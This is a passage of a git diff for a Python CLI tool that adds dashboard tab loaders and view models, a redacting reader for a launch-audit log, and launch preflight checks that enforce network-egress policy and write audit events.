scc_cli.docker import core as docker_core + + _ = refresh_at + + items: list[DashboardItem] = [] + + items.append( + StatusItem( + label="New session", + description="", + action=StatusAction.START_SESSION, + ) + ) + + try: + recent_result = session_service.list_recent(SessionFilter(limit=1, include_all=True)) + recent_session = recent_result.sessions[0] if recent_result.sessions else None + if recent_session: + workspace = recent_session.workspace + workspace_name = workspace.split("/")[-1] if workspace else "unknown" + last_used = recent_session.last_used + last_used_display = "" + if last_used: + last_used_display = format_last_used(last_used) if format_last_used else last_used + desc_parts = [workspace_name] + if recent_session.branch: + desc_parts.append(str(recent_session.branch)) + if last_used_display: + desc_parts.append(last_used_display) + items.append( + StatusItem( + label="Resume last", + description=" · ".join(desc_parts), + action=StatusAction.RESUME_SESSION, + session=recent_session, + ) + ) + except Exception: + pass + + try: + user_config = config.load_user_config() + team = user_config.get("selected_profile") + org_source = user_config.get("organization_source") + + if team: + items.append( + StatusItem( + label=f"Team: {team}", + description="", + action=StatusAction.SWITCH_TEAM, + ) + ) + else: + items.append( + StatusItem( + label="Team: none", + description="", + action=StatusAction.SWITCH_TEAM, + ) + ) + + try: + workspace_path = Path(os.getcwd()) + profile_status = get_profile_status(workspace_path) + + if profile_status.exists: + if profile_status.import_count > 0: + profile_label = f"Profile: saved · ↓ {profile_status.import_count} importable" + elif profile_status.has_drift: + profile_label = "Profile: saved · ◇ drifted" + else: + profile_label = "Profile: saved · ✓ synced" + items.append( + StatusItem( + label=profile_label, + description="", + action=StatusAction.OPEN_PROFILE, + ) + ) + else: + items.append( + StatusItem( + label="Profile: none", + description="", + action=StatusAction.OPEN_PROFILE, + ) + ) + except Exception: + pass + + if org_source and isinstance(org_source, dict): + org_url = org_source.get("url", "") + if org_url: + org_name = None + try: + org_config = config.load_cached_org_config() + if org_config: + org_name = org_config.get("organization", {}).get("name") + except Exception: + org_name = None + + if not org_name: + org_name = org_url.replace("https://", "").replace("http://", "").split("/")[0] + + items.append( + StatusItem( + label=f"Organization: {org_name}", + description="", + ) + ) + elif user_config.get("standalone"): + items.append( + StatusItem( + label="Mode: standalone", + description="", + ) + ) + + except Exception: + items.append( + StatusItem( + label="Config: error", + description="", + ) + ) + + try: + containers = docker_core.list_scc_containers() + running = sum(1 for container in containers if "Up" in container.status) + total = len(containers) + items.append( + StatusItem( + label=f"Containers: {running}/{total} running", + description="", + action=StatusAction.OPEN_TAB, + action_tab=DashboardTab.CONTAINERS, + ) + ) + except Exception: + pass + + items.append( + StatusItem( + label="Settings", + description="", + action=StatusAction.OPEN_SETTINGS, + ) + ) + + return DashboardTabData( + tab=DashboardTab.STATUS, + title="Status", + items=items, + count_active=len(items), + count_total=len(items), + ) + + +def _container_info_to_summary(info: object) -> ContainerSummary: + """Map a docker.core.ContainerInfo to the application-layer ContainerSummary.""" + return ContainerSummary( + id=info.id, # type: ignore[attr-defined] + name=info.name, # type: ignore[attr-defined] + status=info.status, # type: ignore[attr-defined] + profile=getattr(info, "profile", None), + workspace=getattr(info, "workspace", None), + branch=getattr(info, "branch", None), + created=getattr(info, "created", None), + ) + + +def load_containers_tab_data() -> DashboardTabData: + """Load Containers tab data showing SCC-managed containers.""" + from scc_cli.docker import core as docker_core + + items: list[DashboardItem] = [] + + try: + containers = docker_core.list_scc_containers() + running_count = 0 + + for container in containers: + is_running = "Up" in container.status if container.status else False + if is_running: + running_count += 1 + label = container.name + summary = _container_info_to_summary(container) + description = _format_container_description(summary) + items.append(ContainerItem(label=label, description=description, container=summary)) + + if not items: + items.append( + PlaceholderItem( + label="No containers", + description="Press 'n' to start or run `scc start `", + kind=PlaceholderKind.NO_CONTAINERS, + startable=True, + ) + ) + + return DashboardTabData( + tab=DashboardTab.CONTAINERS, + title="Containers", + items=items, + count_active=running_count, + count_total=len(containers), + ) + + except Exception: + return DashboardTabData( + tab=DashboardTab.CONTAINERS, + title="Containers", + items=[ + PlaceholderItem( + label="Error", + description="Unable to query Docker", + kind=PlaceholderKind.ERROR, + ) + ], + count_active=0, + count_total=0, + ) + + +def load_sessions_tab_data( + *, + session_service: SessionService, + format_last_used: Callable[[str], str] | None = None, +) -> DashboardTabData: + """Load Sessions tab data showing recent sessions.""" + items: list[DashboardItem] = [] + + try: + recent_result = session_service.list_recent(SessionFilter(limit=20, include_all=True)) + recent = recent_result.sessions + + for session in recent: + desc_parts = [] + + if session.team: + desc_parts.append(str(session.team)) + if session.branch: + desc_parts.append(str(session.branch)) + if session.last_used: + desc_parts.append( + format_last_used(session.last_used) if format_last_used else session.last_used + ) + + items.append( + SessionItem( + label=session.name or "Unnamed", + description=" · ".join(desc_parts), + session=session, + ) + ) + + if not items: + items.append( + PlaceholderItem( + label="No sessions", + description="Press Enter to start", + kind=PlaceholderKind.NO_SESSIONS, + startable=True, + ) + ) + + return DashboardTabData( + tab=DashboardTab.SESSIONS, + title="Sessions", + items=items, + count_active=len(recent), + count_total=len(recent), + ) + + except Exception: + return DashboardTabData( + tab=DashboardTab.SESSIONS, + title="Sessions", + items=[ + PlaceholderItem( + label="Error", + description="Unable to load sessions", + kind=PlaceholderKind.ERROR, + ) + ], + count_active=0, + count_total=0, + ) + + +def load_worktrees_tab_data(verbose: bool = False) -> DashboardTabData: + """Load Worktrees tab data showing git worktrees.""" + import os + from pathlib import Path + + from scc_cli.services.git.worktree import get_worktree_status, get_worktrees_data + + items: list[DashboardItem] = [] + + try: + cwd = Path(os.getcwd()) + worktrees = get_worktrees_data(cwd) + current_path = os.path.realpath(cwd) + + for worktree in worktrees: + if os.path.realpath(worktree.path) == current_path: + worktree.is_current = True + + if verbose: + staged, modified, untracked, timed_out = get_worktree_status(worktree.path) + worktree.staged_count = staged + worktree.modified_count = modified + worktree.untracked_count = untracked + worktree.status_timed_out = timed_out + worktree.has_changes = (staged + modified + untracked) > 0 + + current_count = sum(1 for worktree in worktrees if worktree.is_current) + + for worktree in worktrees: + description = _format_worktree_description(worktree, verbose=verbose) + items.append( + WorktreeItem( + label=Path(worktree.path).name, + description=description, + path=worktree.path, + ) + ) + + if not items: + items.append( + PlaceholderItem( + label="No worktrees", + description="Press w for recent · i to init · c to clone", + kind=PlaceholderKind.NO_WORKTREES, + ) + ) + + return DashboardTabData( + tab=DashboardTab.WORKTREES, + title="Worktrees", + items=items, + count_active=current_count, + count_total=len(worktrees), + ) + + except Exception: + return DashboardTabData( + tab=DashboardTab.WORKTREES, + title="Worktrees", + items=[ + PlaceholderItem( + label="Not available", + description="Press w for recent · i to init · c to clone", + kind=PlaceholderKind.NO_GIT, + ) + ], + count_active=0, + count_total=0, + ) + + +def load_all_tab_data( + *, + session_service: SessionService, + format_last_used: Callable[[str], str] | None = None, + verbose_worktrees: bool = False, +) -> Mapping[DashboardTab, DashboardTabData]: + """Load data for all dashboard tabs.""" + return { + DashboardTab.STATUS: load_status_tab_data( + session_service=session_service, + format_last_used=format_last_used, + ), + DashboardTab.CONTAINERS: load_containers_tab_data(), + DashboardTab.SESSIONS: load_sessions_tab_data( + session_service=session_service, + format_last_used=format_last_used, + ), + DashboardTab.WORKTREES: load_worktrees_tab_data(verbose=verbose_worktrees), + } + + +def _format_container_description(container: ContainerSummary) -> str: + desc_parts: list[str] = [] + + if container.workspace: + workspace_name = container.workspace.split("/")[-1] + desc_parts.append(workspace_name) + + if container.status: + time_str = _extract_container_time(container.status) + if container.status.startswith("Up"): + desc_parts.append(f"● {time_str}") + else: + desc_parts.append("○ stopped") + + return " · ".join(desc_parts) + + +def _extract_container_time(status: str) -> str: + import re + + match = re.search(r"Up\s+(.+)", status) + if match: + return match.group(1) + return status + + +def _format_worktree_description(worktree: WorktreeInfo, *, verbose: bool) -> str: + from scc_cli import git + + desc_parts: list[str] = [] + if worktree.branch: + desc_parts.append(git.get_display_branch(worktree.branch)) + + if verbose: + if worktree.status_timed_out: + desc_parts.append("status timeout") + else: + status_parts = [] + if worktree.staged_count > 0: + status_parts.append(f"+{worktree.staged_count}") + if worktree.modified_count > 0: + status_parts.append(f"!{worktree.modified_count}") + if worktree.untracked_count > 0: + status_parts.append(f"?{worktree.untracked_count}") + if status_parts: + desc_parts.append(" ".join(status_parts)) + elif not worktree.has_changes: + desc_parts.append("clean") + elif worktree.has_changes: + desc_parts.append("modified") + + if worktree.is_current: + desc_parts.append("(current)") + + return " ".join(desc_parts) diff --git a/src/scc_cli/application/dashboard_models.py b/src/scc_cli/application/dashboard_models.py new file mode 100644 index 0000000..07b0f40 --- /dev/null +++ b/src/scc_cli/application/dashboard_models.py @@ -0,0 +1,391 @@ +"""Dashboard view models, events, and type definitions.""" + +from __future__ import annotations + +from collections.abc import Callable, Mapping, Sequence +from dataclasses import dataclass +from enum import Enum, auto +from typing import TypeAlias + +from scc_cli.ports.session_models import SessionSummary + + +class DashboardTab(Enum): + """Available dashboard tabs.""" + + STATUS = auto() + CONTAINERS = auto() + SESSIONS = auto() + WORKTREES = auto() + + @property + def display_name(self) -> str: + """Human-readable name for display in chrome.""" + names = { + DashboardTab.STATUS: "Status", + DashboardTab.CONTAINERS: "Containers", + DashboardTab.SESSIONS: "Sessions", + DashboardTab.WORKTREES: "Worktrees", + } + return names[self] + + +TAB_ORDER: tuple[DashboardTab, ...] = ( + DashboardTab.STATUS, + DashboardTab.CONTAINERS, + DashboardTab.SESSIONS, + DashboardTab.WORKTREES, +) + + +class StatusAction(Enum): + """Supported actions for status tab items.""" + + START_SESSION = auto() + RESUME_SESSION = auto() + SWITCH_TEAM = auto() + OPEN_TAB = auto() + INSTALL_STATUSLINE = auto() + OPEN_PROFILE = auto() + OPEN_SETTINGS = auto() + + +class PlaceholderKind(Enum): + """Placeholder rows for empty or error states.""" + + NO_CONTAINERS = auto() + NO_SESSIONS = auto() + NO_WORKTREES = auto() + NO_GIT = auto() + ERROR = auto() + CONFIG_ERROR = auto() + + +@dataclass(frozen=True) +class ContainerSummary: + """Application-layer container metadata. + + Mirrors the fields of docker.core.ContainerInfo without coupling + the application layer to the docker package. + """ + + id: str + name: str + status: str + profile: str | None = None + workspace: str | None = None + branch: str | None = None + created: str | None = None + + +@dataclass(frozen=True) +class StatusItem: + """Status tab row with optional action metadata.""" + + label: str + description: str + action: StatusAction | None = None + action_tab: DashboardTab | None = None + session: SessionSummary | None = None + + +@dataclass(frozen=True) +class PlaceholderItem: + """Placeholder row for empty/error states.""" + + label: str + description: str + kind: PlaceholderKind + startable: bool = False + + +@dataclass(frozen=True) +class ContainerItem: + """Container row backed by container metadata.""" + + label: str + description: str + container: ContainerSummary + + +@dataclass(frozen=True) +class SessionItem: + """Session row backed by session metadata.""" + + label: str + description: str + session: SessionSummary + + +@dataclass(frozen=True) +class WorktreeItem: + """Worktree row backed by git worktree data.""" + + label: str + description: str + path: str + + +DashboardItem: TypeAlias = StatusItem | PlaceholderItem | ContainerItem | SessionItem | WorktreeItem + + +@dataclass(frozen=True) +class DashboardTabData: + """View model for a single dashboard tab.""" + + tab: DashboardTab + title: str + items: Sequence[DashboardItem] + count_active: int + count_total: int + + @property + def subtitle(self) -> str: + """Generate subtitle from counts.""" + if self.count_active == self.count_total: + return f"{self.count_total} total" + return f"{self.count_active} active, {self.count_total} total" + + +@dataclass(frozen=True) +class DashboardViewModel: + """View model for a full dashboard render.""" + + active_tab: DashboardTab + tabs: Mapping[DashboardTab, DashboardTabData] + status_message: str | None + verbose_worktrees: bool + + +@dataclass(frozen=True) +class DashboardFlowState: + """Flow state preserved between dashboard runs.""" + + restore_tab: DashboardTab | None = None + toast_message: str | None = None + verbose_worktrees: bool = False + + +class StartFlowDecision(Enum): + """Decision outcomes from the start flow.""" + + LAUNCHED = auto() + CANCELLED = auto() + QUIT = auto() + + +@dataclass(frozen=True) +class StartFlowResult: + """Result from executing the start flow.""" + + decision: StartFlowDecision + message: str | None = None + + @classmethod + def from_legacy(cls, result: bool | None) -> StartFlowResult: + """Convert legacy bool/None start result into a structured outcome.""" + if result is None: + return cls(decision=StartFlowDecision.QUIT) + if result is True: + return cls(decision=StartFlowDecision.LAUNCHED) + return cls(decision=StartFlowDecision.CANCELLED) + + +@dataclass(frozen=True) +class TeamSwitchEvent: + """Event for switching teams.""" + + +@dataclass(frozen=True) +class StartFlowEvent: + """Event for starting a new session flow.""" + + return_to: DashboardTab + reason: str + + +@dataclass(frozen=True) +class RefreshEvent: + """Event for refreshing dashboard data.""" + + return_to: DashboardTab + + +@dataclass(frozen=True) +class SessionResumeEvent: + """Event for resuming a session.""" + + return_to: DashboardTab + session: SessionSummary + + +@dataclass(frozen=True) +class StatuslineInstallEvent: + """Event for installing statusline.""" + + return_to: DashboardTab + + +@dataclass(frozen=True) +class RecentWorkspacesEvent: + """Event for picking a recent workspace.""" + + return_to: DashboardTab + + +@dataclass(frozen=True) +class GitInitEvent: + """Event for initializing git.""" + + return_to: DashboardTab + + +@dataclass(frozen=True) +class CreateWorktreeEvent: + """Event for creating a worktree or cloning.""" + + return_to: DashboardTab + is_git_repo: bool + + +@dataclass(frozen=True) +class VerboseToggleEvent: + """Event for toggling verbose worktree status.""" + + return_to: DashboardTab + verbose: bool + + +@dataclass(frozen=True) +class SettingsEvent: + """Event for opening settings.""" + + return_to: DashboardTab + + +@dataclass(frozen=True) +class ContainerStopEvent: + """Event for stopping a container.""" + + return_to: DashboardTab + container_id: str + container_name: str + + +@dataclass(frozen=True) +class ContainerResumeEvent: + """Event for resuming a container.""" + + return_to: DashboardTab + container_id: str + container_name: str + + +@dataclass(frozen=True) +class ContainerRemoveEvent: + """Event for removing a container.""" + + return_to: DashboardTab + container_id: str + container_name: str + + +@dataclass(frozen=True) +class ProfileMenuEvent: + """Event for opening the profile menu.""" + + return_to: DashboardTab + + +@dataclass(frozen=True) +class SandboxImportEvent: + """Event for importing sandbox plugins.""" + + return_to: DashboardTab + + +@dataclass(frozen=True) +class ContainerActionMenuEvent: + """Event for the container action menu.""" + + return_to: DashboardTab + container_id: str + container_name: str + + +@dataclass(frozen=True) +class SessionActionMenuEvent: + """Event for the session action menu.""" + + return_to: DashboardTab + session: SessionSummary + + +@dataclass(frozen=True) +class WorktreeActionMenuEvent: + """Event for the worktree action menu.""" + + return_to: DashboardTab + worktree_path: str + + +DashboardEvent: TypeAlias = ( + TeamSwitchEvent + | StartFlowEvent + | RefreshEvent + | SessionResumeEvent + | StatuslineInstallEvent + | RecentWorkspacesEvent + | GitInitEvent + | CreateWorktreeEvent + | VerboseToggleEvent + | SettingsEvent + | ContainerStopEvent + | ContainerResumeEvent + | ContainerRemoveEvent + | ProfileMenuEvent + | SandboxImportEvent + | ContainerActionMenuEvent + | SessionActionMenuEvent + | WorktreeActionMenuEvent +) + +DashboardEffect: TypeAlias = ( + TeamSwitchEvent + | StartFlowEvent + | SessionResumeEvent + | StatuslineInstallEvent + | RecentWorkspacesEvent + | GitInitEvent + | CreateWorktreeEvent + | SettingsEvent + | ContainerStopEvent + | ContainerResumeEvent + | ContainerRemoveEvent + | ProfileMenuEvent + | SandboxImportEvent + | ContainerActionMenuEvent + | SessionActionMenuEvent + | WorktreeActionMenuEvent +) + + +@dataclass(frozen=True) +class DashboardEffectRequest: + """Effect request emitted from a dashboard event.""" + + state: DashboardFlowState + effect: DashboardEffect + + +@dataclass(frozen=True) +class DashboardFlowOutcome: + """Outcome after handling an event or effect.""" + + state: DashboardFlowState + exit_dashboard: bool = False + + +DashboardNextStep: TypeAlias = DashboardEffectRequest | DashboardFlowOutcome + +DashboardDataLoader: TypeAlias = Callable[[bool], Mapping[DashboardTab, DashboardTabData]] diff --git a/src/scc_cli/application/launch/audit_log.py b/src/scc_cli/application/launch/audit_log.py new file mode 100644 index 0000000..00d74db --- /dev/null +++ b/src/scc_cli/application/launch/audit_log.py @@ -0,0 +1,266 @@ +"""Bounded reader for the durable launch-audit JSONL sink.""" + +from __future__ import annotations + +import json +from dataclasses import asdict, dataclass +from pathlib import Path +from typing import Any + +from scc_cli import config +from scc_cli.core.enums import SeverityLevel + +DEFAULT_LAUNCH_AUDIT_LIMIT = 10 +DEFAULT_SCAN_LINE_FLOOR = 50 +BINARY_CHUNK_SIZE = 8192 + + +@dataclass(frozen=True) +class LaunchAuditEventRecord: + """One parsed launch-audit event from the recent scan window.""" + + line_number: int + event_type: str + message: str + severity: str + occurred_at: str + subject: str | None + provider_id: str | None + failure_reason: str | None + metadata: dict[str, Any] + + +@dataclass(frozen=True) +class LaunchAuditDiagnostics: + """Redaction-safe summary of the recent launch-audit sink state.""" + + sink_path: str + state: str + requested_limit: int + scanned_line_count: int + malformed_line_count: int + last_malformed_line: int | None + recent_events: tuple[LaunchAuditEventRecord, ...] + last_failure: LaunchAuditEventRecord | None + error: str | None = None + + def to_dict(self) -> dict[str, Any]: + """Return a JSON-serializable payload.""" + return asdict(self) + + +def read_launch_audit_diagnostics( + *, + audit_path: Path | None = None, + limit: int = DEFAULT_LAUNCH_AUDIT_LIMIT, + redact_paths: bool = True, +) -> LaunchAuditDiagnostics: + """Read a bounded, redaction-safe summary of recent launch-audit events.""" + resolved_path = audit_path or config.LAUNCH_AUDIT_FILE + requested_limit = max(limit, 0) + sink_path = _redact_string(str(resolved_path), redact_paths=redact_paths) + + if not resolved_path.exists(): + return LaunchAuditDiagnostics( + sink_path=sink_path, + state="unavailable", + requested_limit=requested_limit, + scanned_line_count=0, + malformed_line_count=0, + last_malformed_line=None, + recent_events=(), + last_failure=None, + ) + + try: + if not resolved_path.is_file(): + raise OSError(f"{resolved_path} is not a file") + raw_lines = _tail_lines(resolved_path, max_lines=_scan_line_limit(requested_limit)) + except OSError as exc: + return LaunchAuditDiagnostics( + sink_path=sink_path, + state="unavailable", + requested_limit=requested_limit, + scanned_line_count=0, + malformed_line_count=0, + last_malformed_line=None, + recent_events=(), + last_failure=None, + error=str(exc), + ) + + if len(raw_lines) == 0: + state = ( + "available" if requested_limit == 0 and resolved_path.stat().st_size > 0 else "empty" + ) + return LaunchAuditDiagnostics( + sink_path=sink_path, + state=state, + requested_limit=requested_limit, + scanned_line_count=0, + malformed_line_count=0, + last_malformed_line=None, + recent_events=(), + last_failure=None, + ) + + recent_events: list[LaunchAuditEventRecord] = [] + last_failure: LaunchAuditEventRecord | None = None + malformed_line_count = 0 + last_malformed_line: int | None = None + + for line_number, raw_line in enumerate(raw_lines, start=1): + record = _parse_record( + raw_line, + line_number=line_number, + redact_paths=redact_paths, + ) + if record is None: + malformed_line_count += 1 + last_malformed_line = line_number + continue + recent_events.append(record) + if _is_failure_record(record): + last_failure = record + + limited_events = ( + tuple(reversed(recent_events[-requested_limit:])) if requested_limit > 0 else () + ) + + return LaunchAuditDiagnostics( + sink_path=sink_path, + state="available", + requested_limit=requested_limit, + scanned_line_count=len(raw_lines), + malformed_line_count=malformed_line_count, + last_malformed_line=last_malformed_line, + recent_events=limited_events, + last_failure=last_failure, + ) + + +def _scan_line_limit(limit: int) -> int: + if limit <= 0: + return 0 + return max(limit * 4, DEFAULT_SCAN_LINE_FLOOR) + + +def _tail_lines(path: Path, *, max_lines: int) -> list[str]: + if max_lines <= 0: + return [] + + with path.open("rb") as handle: + handle.seek(0, 2) + file_size = handle.tell() + position = file_size + if file_size == 0: + return [] + + lines: list[bytes] = [] + remainder = b"" + skip_trailing_newline = True + + while position > 0 and len(lines) < max_lines: + read_size = min(BINARY_CHUNK_SIZE, position) + position -= read_size + handle.seek(position) + chunk = handle.read(read_size) + parts = (chunk + remainder).split(b"\n") + remainder = parts[0] + + for part in reversed(parts[1:]): + if skip_trailing_newline and part == b"": + skip_trailing_newline = False + continue + skip_trailing_newline = False + lines.append(part) + if len(lines) >= max_lines: + break + + if len(lines) < max_lines and remainder: + lines.append(remainder) + + return [line.decode("utf-8", errors="replace") for line in reversed(lines)] + + +def _parse_record( + raw_line: str, + *, + line_number: int, + redact_paths: bool, +) -> LaunchAuditEventRecord | None: + if raw_line.strip() == "": + return None + + try: + payload = json.loads(raw_line) + except json.JSONDecodeError: + return None + + if not isinstance(payload, dict): + return None + + sanitized_payload = _redact_value(payload, redact_paths=redact_paths) + if not isinstance(sanitized_payload, dict): + return None + + event_type = sanitized_payload.get("event_type") + message = sanitized_payload.get("message") + severity = sanitized_payload.get("severity") + occurred_at = sanitized_payload.get("occurred_at") + metadata = sanitized_payload.get("metadata") + subject = sanitized_payload.get("subject") + + if not isinstance(event_type, str): + return None + if not isinstance(message, str): + return None + if not isinstance(severity, str): + return None + if not isinstance(occurred_at, str): + return None + if not isinstance(metadata, dict): + return None + if subject is not None and not isinstance(subject, str): + return None + + provider_id = metadata.get("provider_id") + if provider_id is not None and not isinstance(provider_id, str): + provider_id = None + + failure_reason = metadata.get("failure_reason") + if failure_reason is not None and not isinstance(failure_reason, str): + failure_reason = None + + return LaunchAuditEventRecord( + line_number=line_number, + event_type=event_type, + message=message, + severity=severity, + occurred_at=occurred_at, + subject=subject, + provider_id=provider_id or subject, + failure_reason=failure_reason, + metadata=metadata, + ) + + +def _is_failure_record(record: LaunchAuditEventRecord) -> bool: + return record.severity == SeverityLevel.ERROR.value or record.event_type.endswith(".failed") + + +def _redact_value(value: Any, *, redact_paths: bool) -> Any: + if isinstance(value, str): + return _redact_string(value, redact_paths=redact_paths) + if isinstance(value, dict): + return {key: _redact_value(item, redact_paths=redact_paths) for key, item in value.items()} + if isinstance(value, list): + return [_redact_value(item, redact_paths=redact_paths) for item in value] + return value + + +def _redact_string(value: str, *, redact_paths: bool) -> str: + if not redact_paths: + return value + home = str(Path.home()) + return value.replace(home, "~") if home in value else value diff --git a/src/scc_cli/application/launch/finalize_launch.py b/src/scc_cli/application/launch/finalize_launch.py index 7c5c89b..52db2fe 100644 --- a/src/scc_cli/application/launch/finalize_launch.py +++ b/src/scc_cli/application/launch/finalize_launch.py @@ -2,11 +2,23 @@ from __future__ import annotations +from scc_cli.application.launch.preflight import ( + build_launch_started_event, + build_preflight_failure_event, + evaluate_launch_preflight, +) from scc_cli.application.start_session import ( StartSessionDependencies, StartSessionPlan, start_session, ) +from scc_cli.core.contracts import AuditEvent +from scc_cli.core.errors import ( + LaunchAuditUnavailableError, + LaunchAuditWriteError, + LaunchPreflightError, +) +from scc_cli.ports.audit_event_sink import AuditEventSink from scc_cli.ports.models import SandboxHandle FinalizeLaunchDependencies = StartSessionDependencies @@ -19,21 +31,36 @@ def finalize_launch( *, dependencies: FinalizeLaunchDependencies, ) -> FinalizeLaunchResult: - """Finalize a prepared launch plan by starting the sandbox runtime. + """Finalize a prepared launch plan by validating then starting the sandbox.""" + if _uses_preflight_seam(plan, dependencies): + sink = dependencies.audit_event_sink + if sink is None: + raise LaunchAuditUnavailableError() + try: + decision = evaluate_launch_preflight(plan) + except LaunchPreflightError as error: + _append_audit_event(sink, build_preflight_failure_event(plan, error)) + raise + _append_audit_event(sink, decision.audit_event) + handle = start_session(plan, dependencies=dependencies) + _append_audit_event(sink, build_launch_started_event(plan, decision, handle)) + return handle + return start_session(plan, dependencies=dependencies) - Invariants: - - Delegates to the existing start session execution to preserve behavior. - - Does not perform any CLI output or prompting. - Args: - plan: Prepared launch plan ready to execute. - dependencies: Ports and collaborators required to run the sandbox. +def _uses_preflight_seam( + plan: FinalizeLaunchPlan, + dependencies: FinalizeLaunchDependencies, +) -> bool: + return plan.agent_launch_spec is not None or dependencies.audit_event_sink is not None - Returns: - SandboxHandle for the launched session. - Raises: - SCCError: Propagated from sandbox runtime execution failures. - ValueError: Raised if the plan is missing a sandbox specification. - """ - return start_session(plan, dependencies=dependencies) +def _append_audit_event(sink: AuditEventSink, event: AuditEvent) -> None: + try: + sink.append(event) + except Exception as exc: # pragma: no cover - defensive wrapper over sink adapters + raise LaunchAuditWriteError( + audit_destination=sink.describe_destination(), + event_type=event.event_type, + reason=str(exc), + ) from exc diff --git a/src/scc_cli/application/launch/preflight.py b/src/scc_cli/application/launch/preflight.py new file mode 100644 index 0000000..9112bf8 --- /dev/null +++ b/src/scc_cli/application/launch/preflight.py @@ -0,0 +1,195 @@ +"""Provider-neutral launch preflight validation and audit-event builders.""" + +from __future__ import annotations + +from dataclasses import dataclass + +from scc_cli.application.start_session import StartSessionPlan +from scc_cli.core.contracts import AgentLaunchSpec, AuditEvent +from scc_cli.core.destination_registry import resolve_destination_sets +from scc_cli.core.enums import NetworkPolicy, SeverityLevel +from scc_cli.core.errors import ( + InvalidLaunchPlanError, + LaunchPolicyBlockedError, + LaunchPreflightError, +) +from scc_cli.ports.models import SandboxHandle + + +@dataclass(frozen=True) +class LaunchPreflightDecision: + """Validated launch metadata used by the launch boundary.""" + + provider_id: str + network_policy: str + required_destination_sets: tuple[str, ...] + audit_event: AuditEvent + + +def evaluate_launch_preflight(plan: StartSessionPlan) -> LaunchPreflightDecision: + """Validate that the prepared launch plan can start under the current policy.""" + spec = _validated_launch_spec(plan) + provider_id = _validated_provider_id(spec.provider_id) + required_destination_sets = _validated_required_destination_sets(spec.required_destination_sets) + network_policy = _effective_network_policy(plan) + + if network_policy == NetworkPolicy.LOCKED_DOWN_WEB.value and len(required_destination_sets) > 0: + raise LaunchPolicyBlockedError( + provider_id=provider_id, + network_policy=network_policy, + required_destination_sets=required_destination_sets, + ) + + # Enforced mode: verify all required destination sets are resolvable + if ( + network_policy == NetworkPolicy.WEB_EGRESS_ENFORCED.value + and len(required_destination_sets) > 0 + ): + try: + resolve_destination_sets(required_destination_sets) + except ValueError as exc: + raise LaunchPolicyBlockedError( + provider_id=provider_id, + network_policy=network_policy, + required_destination_sets=required_destination_sets, + user_message=( + f"Launch blocked: enforced egress mode requires resolvable " + f"destination sets but resolution failed — {exc}" + ), + ) from exc + + return LaunchPreflightDecision( + provider_id=provider_id, + network_policy=network_policy, + required_destination_sets=required_destination_sets, + audit_event=AuditEvent( + event_type="launch.preflight.passed", + message=f"Launch preflight passed for provider '{provider_id}'.", + severity=SeverityLevel.INFO, + subject=provider_id, + metadata=_event_metadata( + plan, + provider_id=provider_id, + network_policy=network_policy, + required_destination_sets=required_destination_sets, + ), + ), + ) + + +def build_preflight_failure_event( + plan: StartSessionPlan, + error: LaunchPreflightError, +) -> AuditEvent: + """Build the canonical audit event for a failed launch preflight.""" + provider_id = _safe_provider_id(plan) + required_destination_sets = _safe_required_destination_sets(plan) + network_policy = _effective_network_policy(plan) + metadata = _event_metadata( + plan, + provider_id=provider_id, + network_policy=network_policy, + required_destination_sets=required_destination_sets, + ) + metadata["failure_reason"] = error.user_message + return AuditEvent( + event_type="launch.preflight.failed", + message=(f"Launch preflight failed for provider '{provider_id or 'unknown'}'."), + severity=SeverityLevel.ERROR, + subject=provider_id or None, + metadata=metadata, + ) + + +def build_launch_started_event( + plan: StartSessionPlan, + decision: LaunchPreflightDecision, + handle: SandboxHandle, +) -> AuditEvent: + """Build the canonical audit event for a successful runtime handoff.""" + metadata = _event_metadata( + plan, + provider_id=decision.provider_id, + network_policy=decision.network_policy, + required_destination_sets=decision.required_destination_sets, + ) + metadata["sandbox_id"] = handle.sandbox_id + if handle.name: + metadata["sandbox_name"] = handle.name + return AuditEvent( + event_type="launch.started", + message=f"Launch started for provider '{decision.provider_id}'.", + severity=SeverityLevel.INFO, + subject=decision.provider_id, + metadata=metadata, + ) + + +def _validated_launch_spec(plan: StartSessionPlan) -> AgentLaunchSpec: + spec = plan.agent_launch_spec + if spec is None: + raise InvalidLaunchPlanError( + reason="Launch plan is missing provider launch metadata.", + ) + return spec + + +def _validated_provider_id(provider_id: str) -> str: + normalized = provider_id.strip() + if normalized == "": + raise InvalidLaunchPlanError( + reason="Launch plan is missing provider identity.", + ) + return normalized + + +def _validated_required_destination_sets( + required_destination_sets: tuple[str, ...], +) -> tuple[str, ...]: + normalized: list[str] = [] + for destination_set in required_destination_sets: + cleaned = destination_set.strip() + if cleaned == "": + raise InvalidLaunchPlanError( + reason="Launch plan contains a blank required destination set name.", + ) + normalized.append(cleaned) + return tuple(normalized) + + +def _effective_network_policy(plan: StartSessionPlan) -> str: + sandbox_spec = plan.sandbox_spec + if sandbox_spec is None or sandbox_spec.network_policy is None: + return NetworkPolicy.OPEN.value + return sandbox_spec.network_policy + + +def _safe_provider_id(plan: StartSessionPlan) -> str: + spec = plan.agent_launch_spec + if spec is None: + return "" + return spec.provider_id.strip() + + +def _safe_required_destination_sets(plan: StartSessionPlan) -> tuple[str, ...]: + spec = plan.agent_launch_spec + if spec is None: + return () + return tuple(destination_set.strip() for destination_set in spec.required_destination_sets) + + +def _event_metadata( + plan: StartSessionPlan, + *, + provider_id: str, + network_policy: str, + required_destination_sets: tuple[str, ...], +) -> dict[str, str]: + return { + "provider_id": provider_id, + "network_policy": network_policy, + "required_destination_sets": ",".join(required_destination_sets), + "workspace_path": str(plan.workspace_path), + "session_name": plan.session_name or "", + "team": plan.team or "", + } diff --git a/src/scc_cli/application/launch/start_wizard.py b/src/scc_cli/application/launch/start_wizard.py index 85a3af8..39dc442 100644 --- a/src/scc_cli/application/launch/start_wizard.py +++ b/src/scc_cli/application/launch/start_wizard.py @@ -177,6 +177,25 @@ class CancelRequested: | CancelRequested ) +# Re-export ViewModel/Option/Prompt types from wizard_models for backward compatibility +from scc_cli.application.launch.wizard_models import ( # noqa: E402, F401 + CwdContext, + QuickResumeOption, + QuickResumeViewModel, + StartWizardOutcome, + StartWizardProgress, + StartWizardPrompt, + StartWizardViewModel, + TeamOption, + TeamRepoOption, + TeamRepoPickerViewModel, + TeamSelectionViewModel, + WorkspacePickerViewModel, + WorkspaceSourceOption, + WorkspaceSourceViewModel, + WorkspaceSummary, +) + def initialize_start_wizard(config: StartWizardConfig) -> StartWizardState: """Initialize the start wizard state. @@ -405,202 +424,6 @@ def _terminal_back_or_cancel(state: StartWizardState) -> StartWizardState: return StartWizardState(step=step, context=state.context, config=state.config) -@dataclass(frozen=True) -class TeamOption: - """Team option for selection prompts.""" - - name: str - description: str = "" - 